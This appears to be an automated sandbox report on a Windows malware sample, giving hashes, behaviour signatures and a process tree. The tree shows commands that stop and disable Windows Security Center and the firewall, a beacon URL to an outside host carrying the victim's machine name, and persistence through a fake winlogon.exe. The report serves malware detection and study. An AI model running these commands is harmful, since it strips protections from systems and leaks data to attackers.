Analysis

  • max time kernel
    145s
  • max time network
    168s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    02-12-2022 22:34

General

  • Target

    89fcb2ad64320c6fad68c32bb7c75f218704517bd758c4c967c693f18a1abbeb.exe

  • Size

    44KB

  • MD5

    c55a42e3da354cb60afc41cbf74281d2

  • SHA1

    9fd937edbcc4e54345b2a102b83aaecb33598a45

  • SHA256

    89fcb2ad64320c6fad68c32bb7c75f218704517bd758c4c967c693f18a1abbeb

  • SHA512

    4c3026cb698146c6afd57e2e61cd890583066605a7c86b17d7dbef544cdc6c2cce6d179378776e6e5b2c0d03ef384b3bbbc43e5be138ac211de5177cbdebe2f6

  • SSDEEP

    768:8YnuR7Rll/tVbh6lVh/EWmc56EGNg62hbrQWwnCE1:8GGl/klVGWAnCE1

Score
10/10

Malware Config

Signatures

  • Disables service(s) 2 TTPs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies service settings 1 TTPs

    Alters the configuration of existing services.

  • Stops running service(s) 3 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Launches sc.exe 2 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\89fcb2ad64320c6fad68c32bb7c75f218704517bd758c4c967c693f18a1abbeb.exe
    "C:\Users\Admin\AppData\Local\Temp\89fcb2ad64320c6fad68c32bb7c75f218704517bd758c4c967c693f18a1abbeb.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:364
    • \??\c:\winlogon.exe
      c:\winlogon.exe
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c sc stop wscsvc sc config wscsvc start=disabled
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\SysWOW64\sc.exe
          sc stop wscsvc sc config wscsvc start=disabled
          4⤵
          • Launches sc.exe
          PID:1496
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c sc stop sharedAccess sc config sharedAccess start=disabled
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:540
        • C:\Windows\SysWOW64\sc.exe
          sc stop sharedAccess sc config sharedAccess start=disabled
          4⤵
          • Launches sc.exe
          PID:600
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://albumstreet.al.funpic.org/1pdate.php?datos=<br><b>...:::.12/5/2022 7:31:44 PM:::...<br>Instalacion Completa<br></b>&user=VUIIVLGQ - Admin
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1176
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1176 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1424

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\2IUVQE0L.txt

    Filesize

    608B

    MD5

    30cd9c87582c4e2956519553d0df129a

    SHA1

    65b17d0837c33b789547841de6a24b724526bebc

    SHA256

    6ad30853fd02e59bb286b6ef093c32ee2cb58711e46591808a332fcf3dd76a8d

    SHA512

    0bbd3b921b7315bbda22a04630f7a330ef188088b705bffc8bf207afe6df95693948d49a7e45ae5540f2a1c766f4351e0b946ed69794cf455e1e2af9441f03aa

  • C:\winlogon.exe

    Filesize

    44KB

    MD5

    c55a42e3da354cb60afc41cbf74281d2

    SHA1

    9fd937edbcc4e54345b2a102b83aaecb33598a45

    SHA256

    89fcb2ad64320c6fad68c32bb7c75f218704517bd758c4c967c693f18a1abbeb

    SHA512

    4c3026cb698146c6afd57e2e61cd890583066605a7c86b17d7dbef544cdc6c2cce6d179378776e6e5b2c0d03ef384b3bbbc43e5be138ac211de5177cbdebe2f6

  • \??\c:\winlogon.exe

    Filesize

    44KB

    MD5

    c55a42e3da354cb60afc41cbf74281d2

    SHA1

    9fd937edbcc4e54345b2a102b83aaecb33598a45

    SHA256

    89fcb2ad64320c6fad68c32bb7c75f218704517bd758c4c967c693f18a1abbeb

    SHA512

    4c3026cb698146c6afd57e2e61cd890583066605a7c86b17d7dbef544cdc6c2cce6d179378776e6e5b2c0d03ef384b3bbbc43e5be138ac211de5177cbdebe2f6

  • memory/540-63-0x0000000000000000-mapping.dmp

  • memory/600-65-0x0000000000000000-mapping.dmp

  • memory/760-62-0x0000000000000000-mapping.dmp

  • memory/1496-64-0x0000000000000000-mapping.dmp

  • memory/1716-56-0x0000000000000000-mapping.dmp

  • memory/1716-60-0x00000000757E1000-0x00000000757E3000-memory.dmp

    Filesize

    8KB